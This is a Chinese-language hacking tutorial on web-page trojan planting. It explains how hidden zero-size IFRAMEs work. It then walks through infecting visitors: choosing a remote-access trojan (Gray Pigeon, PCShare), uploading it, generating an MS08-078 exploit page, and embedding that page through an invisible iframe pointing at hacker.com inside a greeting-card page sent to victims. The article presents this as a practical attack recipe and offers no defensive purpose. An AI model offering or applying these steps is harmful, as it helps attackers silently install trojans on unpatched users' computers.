网页挂马原理揭秘
    网页挂马到如今已经发展出许多方法与应用手段，从IFRAME框架，到利用JS文件调用网页木马，以至于在CSS文件中插入网页木马，或者伪装成图片，甚至利用SWF、RM、AVI等文件的弹窗功能来打开网页木马，都成为黑客经常使用的手段。在这其中IFRAME网页框架挂马是黑客最多用到的经典挂马方式，也是最基础的挂马方式，可以说没有IFRAME，网页木马中有一多半就无法实现完美的隐藏，让用户在不察觉中受到攻击。

    IFRAME是一个非常普通的HTML语言标记，它主要用来在一个网页界面中，划分出左右或者上下的框架，就如同我们电视中的画中画效果一样，IFRAME允许网页中也出现一个框架，用来显示另外一个网页。但是IFRAME功能也被黑客巧妙的利用了，黑客在一些看似正常的网页中，使用大小为0的隐藏框架，让用户在没有察觉中打开含有漏洞溢出内容的恶意网页，这种手法就如同在画中画电视中打开了一个收费频道，但是由于收费频道的画面尺寸被恶意修改成了0，所以看电视的人并不知道自己已经打开了收费频道，因为他并没有看到，但是事实上收费频道却的确在播放，而且会收扣除用户的使用费。

    IFRAME框架挂马实战
    每当年景不景气时，黑客病毒等恶意攻击事件就会接连不断的出现，“黑色星期五”病毒就是最好的证明，据说该病毒的制造者就是因为老板辞退而编写了这样一个贻害人间的病毒。2008年的金融危机有让一大批计算机工程师将无聊都发泄在了制造病毒上，特别是2008年底，圣诞老人送给黑客们的MS08-078漏洞，就是一个非常好的挂马利用方法，下面我们就为大家演示一下如何利用软件漏洞，配合IFRAME标记，进行隐藏的框架挂马。下面我们做过做个演示，比如我们将保存在电脑中的Google网页中插入如下代码：
     <iframe src=http://blog.sina.com.cn/deyumiao width=400 height=300></iframe>

    第一步：首先准备一款得心应手的木马，黑客通常会首选灰鸽子和PCShare，这两款软件在设置上都非常简单，易于操作上手。设置好相关服务，最后声称木马所用的服务控制端

    第二步：使用FTP将木马上传到自己的网站空间中，并用记事本记录下木马的网络路径。然后在用MS08-078网页木马生成器，生成一个带有MS08-078漏洞的恶意网页。

    第三步：找一个正常的新年贺卡网页，将该网页保存到自己指定的目录中，然后使用Web Designer或Dreamweaver网页编辑软件对保存的网页进行调整修改，然后上传到自己的网站空间中，看图片等内容是否能够正常显示。

    第四步：然后再一次打开修改好的贺卡网页，使用IFRAME标记语句，将生成好的MS08-078网页嵌入到贺卡网页中，嵌入挂马代码如下：
    <iframe src=http://www.hacker.com/ms08078.html width=0 height=0></iframe>

    将这段代码插入到贺卡网页之中后，就完成了我们的网页挂马操作。这段代码让正常浏览贺卡网页的用户，在看到贺卡页面之后，也随之运行了保存在指定位置“http://www.hacker.com/ms08078.html”的漏洞溢出页面，但是由于它的长和宽都为“0”，观看贺卡网站的用户不会看到溢出页面，因此非常隐蔽。此时我们的网页挂马页面就完成了，只需要将这个页面发送给其他人，那些没有修补MS08-078漏洞的用户，就会在不知不觉中，中黑客设定的木马。